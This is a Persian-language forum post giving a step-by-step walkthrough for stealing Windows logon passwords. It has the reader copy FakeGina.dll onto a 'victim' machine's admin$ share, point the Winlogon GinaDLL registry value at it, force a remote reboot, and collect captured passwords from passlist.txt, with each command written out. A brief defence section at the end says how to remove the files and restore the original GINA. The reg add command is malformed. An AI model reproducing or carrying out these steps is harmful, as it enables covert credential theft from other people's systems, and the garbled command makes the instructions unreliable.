یک مدل خفن و ناشناخته دزدیدن کلمات عبور !
[FONT=Tahoma]++ با سلام ؛[/FONT]
[FONT=Tahoma] [/FONT]
[FONT=Tahoma]Graphical Identification and Authorization[/FONT][FONT=Tahoma] یا به عبارت ساده تر [/FONT][FONT=Tahoma]GINA[/FONT][FONT=Tahoma] میدانید چه هست ؟؟ در واقع این واسطه ای بین کاربر و سیستم تعیین هویت ویندوز است ، خوب حالا اگر به جای نسخه اصلی آن ما یک نسخه سمی و دستکاری شده قرار بدهیم چگونه است !! بله درست فهمیدید به همین راحتی هر کاربری که به سیستم وارد شود ما به کلمه عبور آن پی میبریم .[/FONT]
[FONT=Tahoma] [/FONT]
[FONT=Tahoma]به این منظور من به شما یک نوع [/FONT][FONT=Tahoma]Fake GINA[/FONT][FONT=Tahoma] را معرفی میکنم ، قبل از هر چیز به [/FONT][FONT=Tahoma][URL="http://www.ntsecurity.nu/"]Ntsecurity.nu[/URL] بروید و [/FONT][FONT=Tahoma]FakeGina.dll[/FONT][FONT=Tahoma] را که [/FONT][FONT=Tahoma]Arne Vidstrom[/FONT][FONT=Tahoma] نوشته را دریافت کنید ، خوب ما فکر میکنیم شما به سیستم دسترسی دارید و امتیاز شما در حد یک مدیر است ، در این هنگام با استفاده از دستور زیر [/FONT][FONT=Tahoma]FakeGina.dll[/FONT][FONT=Tahoma] را در پوشه [/FONT][FONT=Tahoma]%SystemRoot%\system32[/FONT][FONT=Tahoma] کپی میکنید (روی قربانی!!) .[/FONT]
[FONT=Tahoma] [/FONT]
[LIST] [*][FONT=Tahoma]C:\>copy fakegina.dll \\ 10.1.1.3\admin$\system32[/FONT][/LIST][FONT=Tahoma] [/FONT]
[FONT=Tahoma]خوب حالا یک نگاهی به [/FONT][FONT=Tahoma]Resource Kit[/FONT][FONT=Tahoma] های بیلی می اندازیم و ابزار [/FONT][FONT=Tahoma]reg.exe[/FONT][FONT=Tahoma] را پیدا میکنیم و با سوءاستفاده از آن مقدار زیر را به [/FONT][FONT=Tahoma]Registry[/FONT][FONT=Tahoma] قربانی وارد میکنیم . (به مقدار توجه کنید)[/FONT]
[FONT=Tahoma] [/FONT]
[LIST] [*][FONT=Tahoma]C:\>reg add "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GinaDLL=fakegina.dll" REG_SZ \\10.1.1.3[/FONT][/LIST][FONT=Tahoma] [/FONT]
[FONT=Tahoma]خوب حالا نگاهی دوباره به [/FONT][FONT=Tahoma]Resource Kit[/FONT][FONT=Tahoma] های بیلی می اندازیم و ابزار [/FONT][FONT=Tahoma]shutdown[/FONT][FONT=Tahoma] را پیدا میکنیم و با سوء استفاده از آن سیستم را دوباره راه اندازی میکنیم .[/FONT]
[FONT=Tahoma] [/FONT]
[LIST] [*][FONT=Tahoma]C:\>shutdown \\10.1.1.3 /R /T:1 /Y /C[/FONT][/LIST][FONT=Tahoma] [/FONT]
[FONT=Tahoma]خوب عملیات دزدی به پایان رسید حالا منتظر میشویم یک کاربر به سیستم وارد شود ، وقتی وارد شد کافی است که شما یک نگاهی به فایل [/FONT][FONT=Tahoma]%SystemRoot%\system32\passlist.txt[/FONT][FONT=Tahoma] بیندازید .[/FONT]
[FONT=Tahoma] [/FONT]
[B][FONT=Tahoma]راه دفاع :[/FONT][/B]
[B][FONT=Tahoma] [/FONT][/B]
[FONT=Tahoma]قبل از هر چیز [/FONT][FONT=Tahoma]fakegina.dll[/FONT][FONT=Tahoma] و [/FONT][FONT=Tahoma]passlist.txt[/FONT][FONT=Tahoma] را جستجو کنید اگر آنها را یافتید که آنها را نابود کنید ، حال بهتر است یک نسخه [/FONT][FONT=Tahoma]GINA[/FONT][FONT=Tahoma] سالم را دوباره نصب کنید !! و کلید [/FONT][FONT=Tahoma]Registry[/FONT][FONT=Tahoma] را به حالت اول باز گردانید . ( البته من توصیه میکنم یک بار دیگه بیلی را روی سیستم خود نصب کنید . )[/FONT]